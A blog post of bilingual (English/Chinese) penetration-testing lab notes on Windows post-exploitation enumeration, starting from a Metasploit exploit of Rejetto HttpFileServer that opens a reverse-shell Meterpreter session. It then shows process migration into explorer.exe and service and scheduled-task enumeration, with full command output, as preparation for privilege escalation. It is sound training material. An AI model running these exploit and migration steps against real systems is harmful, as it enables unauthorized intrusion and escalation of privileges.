Enumerating Processes & Services

Posted by r3kind1e on June 5, 2023

Windows Local Enumeration

Enumerating Processes & Services

After gaining initial access to a target system, it is always important to learn more about the system like, what processes, services and scheduled tasks are currently running.

What are we looking for?

  • Running processes & services
  • Scheduled tasks

A process is an instance of a running executable (.exe) or program.

A service is a process which runs in the background and does not interact with the desktop.

Demo: Enumerating Processes & Services

Windows 本地枚举

枚举进程和服务

在获得对目标系统的初始访问权限后,了解更多关于系统的信息非常重要,例如当前正在运行的进程、服务和计划任务。

我们在寻找什么?

  • 运行中的进程和服务
  • 计划任务

进程是一个运行的可执行文件(.exe)或程序的实例。

服务是在后台运行且不与桌面交互的进程。

演示:枚举进程和服务

Why is this important? Why processes and services? Like the previous steps that fall under local enumeration. It’s always important to learn more about the system that you’ve just exploited, like what processes, services, and scheduled tasks are currently running. Why is this important? It’s important for a few reasons. In the case of running processes, the reason why we ought to enumerate a list of running processes is, in the event that we want to migrate our current process to another process. An example of this would be, if we have access to a Windows target via an Meterpreter session, and the current process that we’re working with on the target system is unstable and is having issues, we can migrate to a more stable process like explorer.exe. And in order to do this, we need to identify explorer.exe and as well as its process id. Another example comes into play when we will be taking a look at the privilege escalation stage of the post exploitation phase of a penetration test, and this is where scheduled tasks come into play. The reason we want to enumerate a list of scheduled tasks running on the system is primarily because during the privilege escalation phase, we will be trying to identify weaknesses or misconfigurations within each of these scheduled tasks that we can take advantage of in order to elevate our privileges.

Target IP Address : 10.2.19.62

1
2
3
4
5
msfconsole
search rejetto
use 0
set RHOSTS 10.2.19.62
exploit

We get a meterpreter session. Let’s start off by taking a look at how we can enumerate a list of running processes with meterpreter. And then, we’ll move on to the manual commands through a standard command shell session.

If you have access to the Windows target system via Meterpreter session, you can type in the ps command. That will list out a list of running processes.

1
meterpreter > ps

It’ll then sort the information into various columns. One thing you need to take into consideration or that you need to take a special note on is the User column. This will display the privileges associated with a particular process. And in this case, specific Windows processes have NT AUTHORITY\SYSTEM privileges. Given the fact that we have access to the target system as the Administrator user, which is a privileged user account, when we type in ps, it’ll display a list of all the user privileges associated with a particular process. However, if we weren’t a privileged user, and we type in ps, we would get the same information. However, under the User column, wherever the privileges were displayed, in the case of NT AUTHORITY\SYSTEM privileges, that would not be displayed. It would only display the user information pertinent to the current user you have access to. For example, if I gained access to the target system through a user called Bob, and I tryped in ps, and Bod was not a privileged user, it would still display all the processes as well as the process id. However, under the User column, it would not display all the NT AUTHORITY\SYSTEM privileges. It would only display privileges associated with the user Bob. And the other column is Path, that’ll give you the path to the executable itself. The svchost.exe process is derived from the following executable.

How we can migrate our process. We wanted to migrate our process to explorer.exe.

We could use the ps command to list out the list of running processes, and then identify the explorer.exe process. And then take a look at the process id. And then we can type in migrate, specify the process id.

However, you do not need to list out the list of processes. You can utiliz the pgrep utility to search for a particular process name.

For example, I want the process id of explorer.exe.

1
2
meterpreter > pgrep explorer.exe
2176

It will tell me that the process id for explorer.exe is 2176.

So whenever you are trying to obtain a stable meterpreter session, it’s always recommended to migrate to explorer.exe, primarily because explorer.exe is rarely stopped or rarely has any issues in terms of stability as it is required in order for the Windows operating system to function.

We can migrate to a specific process or process id for that matter, by typing in migrate, and then specifying the process id.

1
meterpreter > migrate 2176

We had obtained a 32-bit meterpreter session.

1
2
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator

If we take a look at our current meterpreter session now, you can see that if we migrate to a 64-bit process, we are going to obtain the architecture specific to the process that we migrated to. So explorer.exe was a 64-bit process. And then we migrated to it, we obtained a 64-bit meterpreter session.

1
2
meterpreter > sysinfo
Architecture : x64

And we can utilize the pgrep utility, but not just a limited to migrating to a process. If we were trying to find a particular process, for example, the HTTP file server process.

1
2
meterpreter > pgrep hfs.exe
1684

And if it is running, it’ll tell me the process id. This is a good way of identifying a specific process that you’re interested in, and this will tell you whether it’s running.

1
meterpreter > pgrep aws.exe

If it doesn’t display a process id, that means that it’s not running.

Now that we’ve explored the process of enumerating processes with Meterpreter. Let’s take a look at how to enumerate processes and services with a standard command shell. Because in most cases, you will not have access to a Meterpreter session right out of the box.

I’ll open up a command shell session here.

1
meterpreter > shell

And to get started, we can list or obtain a list of started services.

1
net start

Remember, these are services, not processes. A service runs in the background. And if you go through this list, we’ll not find processes like hfs.exe. These are all the background services that are running. It makes sense to have them running in the background.

If we wanted to list out the services utilizing another utility, like wmic. We can keep the output brief.

1
wmic service list brief

This is going to display a list of all running services. This is all the services that are running in the background. And all of this information is relevant when it comes down to privilege escalation. This information is very important. And the ability to enumerate it is equally as important. That’s how to list all the services with wmic.

We can also list out the list of services or other processes and services using the tasklist command.

1
tasklist /SVC

And this is going to display the list of processes running, as well as the services that are running under a particular process. We have the lsass.exe process here. And then the services that run under lsass.exe. This is the most important command. Because not only does it list out the list of running processes, but also the services that run under a particular process. An example of this would be, if we take a look at hfs.exe, that’s the HTTP File Server. It doesn’t have any services running under hfs.exe or it doesn’t have any services that are responsible for maintaining the functionality of the program itself. For Windows specific processes like svchost and lsass.exe, it’ll display the list of services that are running under that particular process. This is a very important information.

If you also want to list out a list of these scheduled tasks on the system, that can also be done via command shell session, so just an abbreviation for the scheduled tasks. That is going to provide us with the entire list of scheduled tasks that have been configured to run on this target system. This command is going to output a lot of information, which I would recommend that you copy and paste into a text file for later use, and this will come into play during the privilege escalation phase of the post-exploitation phase of a penetration test.

1
schtasks /query /fo LIST

It’s not enumerated additional information that’s really important.

1
schtasks /query /fo LIST /v

Why is this information important? In certain cases, scheduled tasks could be misconfigured or configured in a way that makes them vulnerable to exploitaion, and more specifically, they can be exploited in some cases to elevate our privileges. So in the context of privilege escalation, we would typically be looking for scheduled tasks that are running with the NT AUTHORITY\SYSTEM privileges. And that’s typically what we would be looking for. In that, if we can get that scheduled task to run or execute our specific executable, an executable that we specify, then we can potentially elevate our privileges. And that’s something that will fall under privilege escalation. I would recommend that you copy all of this information and paste it into a text file as it will become important later on.

And for all the information that you’re gathering or that you have gathered during the local enumeration phase of post exploitation, I would recommend that you save all of that information and you ensure that you’re documenting all of the important information that you’re gathering, so that you can use it during the other phases of post-exploitation and also during the reporting stage or phase of the penetration test. You can go through the list, you can then copy this and save it into a text file.

Enumerating Processes & Services(枚举进程和服务)

Overview(概述)

Goal

This lab covers the process of enumerating running processes and services on a Windows target.

目标

本实验涵盖了在 Windows 目标上枚举正在运行的进程和服务的过程。

复现视频内容

Target IP Address : 10.0.23.161

Kali Linux : 10.10.21.3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


msf5 > use 0
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.0.23.161
RHOSTS => 10.0.23.161
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.21.3:4444 
[*] Using URL: http://0.0.0.0:8080/5bADt8e
[*] Local IP: http://10.10.21.3:8080/5bADt8e
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /5bADt8e
[*] Sending stage (180291 bytes) to 10.0.23.161
[*] Meterpreter session 1 opened (10.10.21.3:4444 -> 10.0.23.161:49238) at 2023-06-05 07:07:20 +0530
[!] Tried to delete %TEMP%\FmJep.vbs, unknown result
[*] Server stopped.

meterpreter > 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                           Path
 ---   ----  ----                  ----  -------  ----                           ----
 0     0     [System Process]                                                    
 4     0     System                x64   0                                       
 336   656   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 348   4     smss.exe              x64   0                                       
 492   484   csrss.exe             x64   0                                       
 556   548   csrss.exe             x64   1                                       
 564   484   wininit.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\wininit.exe
 592   548   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 656   564   services.exe          x64   0                                       
 664   564   lsass.exe             x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\lsass.exe
 720   656   svchost.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 732   656   vds.exe               x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\vds.exe
 748   656   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 844   592   dwm.exe               x64   1        Window Manager\DWM-1           C:\Windows\System32\dwm.exe
 860   656   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 884   656   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 904   656   svchost.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 948   656   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 1044  656   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe
 1076  656   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM            C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1144  656   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM            C:\Program Files\Amazon\XenTools\LiteAgent.exe
 1164  656   svchost.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 1200  656   svchost.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 1260  656   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM            C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1288  1836  RNaRKuYfQ.exe         x86   1        WIN-OMCNBKR66MN\Administrator  C:\Users\ADMINI~1\AppData\Local\Temp\1\radFED3F.tmp\RNaRKuYfQ.exe
 1428  720   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\wbem\WmiPrvSE.exe
 1652  720   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\wbem\WmiPrvSE.exe
 1836  3052  wscript.exe           x86   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\SysWOW64\wscript.exe
 1948  656   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 2004  656   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 2104  904   taskhostex.exe        x64   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\System32\taskhostex.exe
 2164  2144  explorer.exe          x64   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\explorer.exe
 2232  656   msdtc.exe             x64   0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\msdtc.exe
 2304  904   WMIADAP.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\wbem\WMIADAP.exe
 2400  2448  conhost.exe           x64   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\System32\conhost.exe
 2448  1288  cmd.exe               x86   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\SysWOW64\cmd.exe
 2748  2164  powershell.exe        x86   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 2756  2748  conhost.exe           x64   1        WIN-OMCNBKR66MN\Administrator  C:\Windows\System32\conhost.exe
 3052  2748  hfs.exe               x86   1        WIN-OMCNBKR66MN\Administrator  C:\hfs\hfs.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > pgrep explorer.exe
2164
meterpreter > migrate 2164
[*] Migrating from 1288 to 2164...
[*] Migration completed successfully.
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
1
2
3
meterpreter > pgrep hfs.exe
3052
meterpreter > pgrep aws.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
meterpreter > shell
Process 1660 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net start
net start
These Windows services are started:

   Amazon SSM Agent
   AWS Lite Guest Agent
   Background Tasks Infrastructure Service
   Base Filtering Engine
   Certificate Propagation
   CNG Key Isolation
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   Device Setup Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostics Tracking Service
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Ec2Config
   Group Policy Client
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   Local Session Manager
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Remote Desktop Configuration
   Remote Desktop Services
   Remote Desktop Services UserMode Port Redirector
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Security Accounts Manager
   Server
   Shell Hardware Detection
   System Event Notification Service
   System Events Broker
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   User Access Logging Service
   User Profile Service
   Windows Connection Manager
   Windows Event Log
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Remote Management (WS-Management)
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation

The command completed successfully.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
C:\Windows\system32>wmic service list brief
wmic service list brief
ExitCode  Name                      ProcessId  StartMode  State    Status  
0         AeLookupSvc               0          Manual     Stopped  OK      
1077      ALG                       0          Manual     Stopped  OK      
0         AmazonSSMAgent            1076       Auto       Running  OK      
1077      AppIDSvc                  0          Manual     Stopped  OK      
1077      Appinfo                   0          Manual     Stopped  OK      
1077      AppMgmt                   0          Manual     Stopped  OK      
1077      AppReadiness              0          Manual     Stopped  OK      
1077      AppXSvc                   0          Manual     Stopped  OK      
1077      AudioEndpointBuilder      0          Manual     Stopped  OK      
1077      Audiosrv                  0          Manual     Stopped  OK      
0         AWSLiteAgent              1144       Auto       Running  OK      
0         BFE                       884        Auto       Running  OK      
1077      BITS                      0          Manual     Stopped  OK      
0         BrokerInfrastructure      720        Auto       Running  OK      
1077      Browser                   0          Disabled   Stopped  OK      
0         CertPropSvc               904        Manual     Running  OK      
1077      cfn-hup                   0          Manual     Stopped  OK      
1077      COMSysApp                 0          Manual     Stopped  OK      
0         CryptSvc                  336        Auto       Running  OK      
0         DcomLaunch                720        Auto       Running  OK      
0         defragsvc                 0          Manual     Stopped  OK      
1077      DeviceAssociationService  0          Manual     Stopped  OK      
0         DeviceInstall             0          Manual     Stopped  OK      
0         Dhcp                      860        Auto       Running  OK      
0         DiagTrack                 1164       Auto       Running  OK      
0         Dnscache                  336        Auto       Running  OK      
1077      dot3svc                   0          Manual     Stopped  OK      
0         DPS                       884        Auto       Running  OK      
0         DsmSvc                    904        Manual     Running  OK      
1077      Eaphost                   0          Manual     Stopped  OK      
0         Ec2Config                 1260       Auto       Running  OK      
1077      EFS                       0          Manual     Stopped  OK      
0         EventLog                  860        Auto       Running  OK      
0         EventSystem               948        Auto       Running  OK      
1077      fdPHost                   0          Manual     Stopped  OK      
1077      FDResPub                  0          Manual     Stopped  OK      
0         FontCache                 948        Auto       Running  OK      
0         gpsvc                     904        Auto       Running  OK      
1077      hidserv                   0          Manual     Stopped  OK      
1077      hkmsvc                    0          Manual     Stopped  OK      
1077      IEEtwCollectorService     0          Manual     Stopped  OK      
0         IKEEXT                    904        Auto       Running  OK      
0         iphlpsvc                  904        Auto       Running  OK      
0         KeyIso                    664        Manual     Running  OK      
1077      KPSSVC                    0          Manual     Stopped  OK      
1077      KtmRm                     0          Manual     Stopped  OK      
0         LanmanServer              904        Auto       Running  OK      
0         LanmanWorkstation         336        Auto       Running  OK      
1077      lltdsvc                   0          Manual     Stopped  OK      
0         lmhosts                   860        Auto       Running  OK      
0         LSM                       720        Auto       Running  OK      
1077      MMCSS                     0          Manual     Stopped  OK      
1077      MozillaMaintenance        0          Manual     Stopped  OK      
1077      MpsSvc                    0          Disabled   Stopped  OK      
0         MSDTC                     2232       Auto       Running  OK      
1077      MSiSCSI                   0          Manual     Stopped  OK      
1077      msiserver                 0          Manual     Stopped  OK      
1077      napagent                  0          Manual     Stopped  OK      
1077      NcaSvc                    0          Manual     Stopped  OK      
1077      Netlogon                  0          Manual     Stopped  OK      
1077      Netman                    0          Manual     Stopped  OK      
0         netprofm                  948        Manual     Running  OK      
1077      NetTcpPortSharing         0          Disabled   Stopped  OK      
0         NlaSvc                    336        Auto       Running  OK      
0         nsi                       948        Auto       Running  OK      
1077      PerfHost                  0          Manual     Stopped  OK      
1077      pla                       0          Manual     Stopped  OK      
0         PlugPlay                  720        Manual     Running  OK      
0         PolicyAgent               2004       Manual     Running  OK      
0         Power                     720        Auto       Running  OK      
1077      PrintNotify               0          Manual     Stopped  OK      
0         ProfSvc                   904        Auto       Running  OK      
1077      RasAuto                   0          Manual     Stopped  OK      
1077      RasMan                    0          Manual     Stopped  OK      
1077      RemoteAccess              0          Disabled   Stopped  OK      
0         RemoteRegistry            0          Auto       Stopped  OK      
0         RpcEptMapper              748        Auto       Running  OK      
1077      RpcLocator                0          Manual     Stopped  OK      
0         RpcSs                     748        Auto       Running  OK      
1077      RSoPProv                  0          Manual     Stopped  OK      
1077      sacsvr                    0          Manual     Stopped  OK      
0         SamSs                     664        Auto       Running  OK      
1077      SCardSvr                  0          Disabled   Stopped  OK      
1077      ScDeviceEnum              0          Manual     Stopped  OK      
0         Schedule                  904        Auto       Running  OK      
1077      SCPolicySvc               0          Manual     Stopped  OK      
1077      seclogon                  0          Manual     Stopped  OK      
0         SENS                      904        Auto       Running  OK      
0         SessionEnv                904        Manual     Running  OK      
1077      SharedAccess              0          Disabled   Stopped  OK      
0         ShellHWDetection          904        Auto       Running  OK      
1077      smphost                   0          Manual     Stopped  OK      
1077      SNMPTRAP                  0          Manual     Stopped  OK      
0         Spooler                   1044       Auto       Running  OK      
0         sppsvc                    0          Auto       Stopped  OK      
1077      SSDPSRV                   0          Disabled   Stopped  OK      
1077      SstpSvc                   0          Manual     Stopped  OK      
1077      svsvc                     0          Manual     Stopped  OK      
1077      swprv                     0          Manual     Stopped  OK      
1077      SysMain                   0          Manual     Stopped  OK      
0         SystemEventsBroker        720        Auto       Running  OK      
1077      TapiSrv                   0          Manual     Stopped  OK      
0         TermService               1948       Manual     Running  OK      
0         Themes                    904        Auto       Running  OK      
1077      THREADORDER               0          Manual     Stopped  OK      
1077      TieringEngineService      0          Manual     Stopped  OK      
0         TrkWks                    1200       Auto       Running  OK      
0         TrustedInstaller          0          Manual     Stopped  OK      
0         UALSVC                    1200       Auto       Running  OK      
1077      UI0Detect                 0          Manual     Stopped  OK      
0         UmRdpService              1200       Manual     Running  OK      
1077      upnphost                  0          Disabled   Stopped  OK      
1077      VaultSvc                  0          Manual     Stopped  OK      
0         vds                       0          Manual     Stopped  OK      
1077      vmicguestinterface        0          Manual     Stopped  OK      
1077      vmicheartbeat             0          Manual     Stopped  OK      
1077      vmickvpexchange           0          Manual     Stopped  OK      
1077      vmicrdv                   0          Manual     Stopped  OK      
1077      vmicshutdown              0          Manual     Stopped  OK      
1077      vmictimesync              0          Manual     Stopped  OK      
1077      vmicvss                   0          Manual     Stopped  OK      
1077      VSS                       0          Manual     Stopped  OK      
0         W32Time                   0          Manual     Stopped  OK      
0         Wcmsvc                    860        Auto       Running  OK      
1077      WcsPlugInService          0          Manual     Stopped  OK      
1077      WdiServiceHost            0          Manual     Stopped  OK      
1077      WdiSystemHost             0          Manual     Stopped  OK      
1077      Wecsvc                    0          Manual     Stopped  OK      
1077      WEPHOSTSVC                0          Manual     Stopped  OK      
1077      wercplsupport             0          Manual     Stopped  OK      
1077      WerSvc                    0          Disabled   Stopped  OK      
0         WinHttpAutoProxySvc       948        Manual     Running  OK      
0         Winmgmt                   904        Auto       Running  OK      
0         WinRM                     336        Auto       Running  OK      
1077      wmiApSrv                  0          Manual     Stopped  OK      
0         WPDBusEnum                0          Manual     Stopped  OK      
1077      WSService                 0          Manual     Stopped  OK      
1077      wuauserv                  0          Manual     Stopped  OK      
1077      wudfsvc                   0          Manual     Stopped  OK      

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
C:\Windows\system32>tasklist /SVC
tasklist /SVC

Image Name                     PID Services                                    
========================= ======== ============================================
System Idle Process              0 N/A                                         
System                           4 N/A                                         
smss.exe                       348 N/A                                         
csrss.exe                      492 N/A                                         
csrss.exe                      556 N/A                                         
wininit.exe                    564 N/A                                         
winlogon.exe                   592 N/A                                         
services.exe                   656 N/A                                         
lsass.exe                      664 KeyIso, SamSs                               
svchost.exe                    720 BrokerInfrastructure, DcomLaunch, LSM,      
                                   PlugPlay, Power, SystemEventsBroker         
svchost.exe                    748 RpcEptMapper, RpcSs                         
dwm.exe                        844 N/A                                         
svchost.exe                    860 Dhcp, EventLog, lmhosts, Wcmsvc             
svchost.exe                    904 CertPropSvc, DsmSvc, gpsvc, IKEEXT,         
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,  
                                   SENS, SessionEnv, ShellHWDetection, Themes, 
                                   Winmgmt                                     
svchost.exe                    948 EventSystem, FontCache, netprofm, nsi,      
                                   WinHttpAutoProxySvc                         
svchost.exe                    336 CryptSvc, Dnscache, LanmanWorkstation,      
                                   NlaSvc, WinRM                               
svchost.exe                    884 BFE, DPS                                    
spoolsv.exe                   1044 Spooler                                     
amazon-ssm-agent.exe          1076 AmazonSSMAgent                              
LiteAgent.exe                 1144 AWSLiteAgent                                
svchost.exe                   1164 DiagTrack                                   
svchost.exe                   1200 TrkWks, UALSVC, UmRdpService                
Ec2Config.exe                 1260 Ec2Config                                   
svchost.exe                   1948 TermService                                 
svchost.exe                   2004 PolicyAgent                                 
taskhostex.exe                2104 N/A                                         
explorer.exe                  2164 N/A                                         
powershell.exe                2748 N/A                                         
conhost.exe                   2756 N/A                                         
hfs.exe                       3052 N/A                                         
msdtc.exe                     2232 MSDTC                                       
cmd.exe                       2448 N/A                                         
conhost.exe                   2400 N/A                                         
cmd.exe                       1660 N/A                                         
conhost.exe                   2508 N/A                                         
tasklist.exe                  2704 N/A                                         
WmiPrvSE.exe                   652 N/A                    
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
C:\Windows\system32>schtasks /query /fo LIST
schtasks /query /fo LIST

Folder: \
HostName:      WIN-OMCNBKR66MN
TaskName:      \Ec2ConfigMonitorTask
Next Run Time: N/A
Status:        Ready
Logon Mode:    Interactive/Background

HostName:      WIN-OMCNBKR66MN
TaskName:      \Ec2ConfigMonitorTask
Next Run Time: N/A
Status:        Ready
Logon Mode:    Interactive/Background

HostName:      WIN-OMCNBKR66MN
TaskName:      \Optimize Start Menu Cache Files-S-1-5-21-2563855374-3215282501-1490390052-500
Next Run Time: N/A
Status:        Disabled
Logon Mode:    Interactive only

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\.NET Framework
HostName:      WIN-OMCNBKR66MN
TaskName:      \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319
Next Run Time: N/A
Status:        Ready
Logon Mode:    Interactive/Background

HostName:      WIN-OMCNBKR66MN
TaskName:      \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64
Next Run Time: N/A
Status:        Ready
Logon Mode:    Interactive/Background

HostName:      WIN-OMCNBKR66MN
TaskName:      \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical
Next Run Time: N/A
Status:        Disabled
Logon Mode:    Interactive/Background

HostName:      WIN-OMCNBKR66MN
TaskName:      \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical
Next Run Time: N/A
Status:        Disabled
Logon Mode:    Interactive/Background

Folder: \Microsoft\Windows\WS
HostName:      WIN-OMCNBKR66MN
TaskName:      \Microsoft\Windows\WS\License Validation
Next Run Time: N/A
Status:        Disabled
Logon Mode:    Interactive/Background

HostName:      WIN-OMCNBKR66MN
TaskName:      \Microsoft\Windows\WS\WSTask
Next Run Time: N/A
Status:        Ready
Logon Mode:    Interactive/Background

Folder: \Mozilla
HostName:      WIN-OMCNBKR66MN
TaskName:      \Mozilla\Firefox Default Browser Agent E7CF176E110C211B
Next Run Time: 6/5/2023 9:05:00 AM
Status:        Ready
Logon Mode:    Interactive only

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
C:\Windows\system32>schtasks /query /fo LIST /v

Folder: \Microsoft\Windows\User Profile Service
HostName:                             WIN-OMCNBKR66MN
TaskName:                             \Microsoft\Windows\User Profile Service\HiveUploadTask
Next Run Time:                        N/A
Status:                               Disabled
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task will automatically upload a roaming user profile's registry hive to its network location.
Scheduled Task State:                 Disabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 120 minutes
Power Management:                     Stop On Battery Mode
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly 
Start Time:                           12:00:00 AM
Start Date:                           8/28/2007
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        12 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\WDI
HostName:                             WIN-OMCNBKR66MN
TaskName:                             \Microsoft\Windows\WDI\ResolutionHost
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Windows Diagnostic Infrastructure Resolution host enables interactive resolutions for system problems detected by the Diagnostic Policy Service. It is triggered when necessary by the Diagnostic Policy Service in the appropriate user session. If the 
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     
Run As User:                          INTERACTIVE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A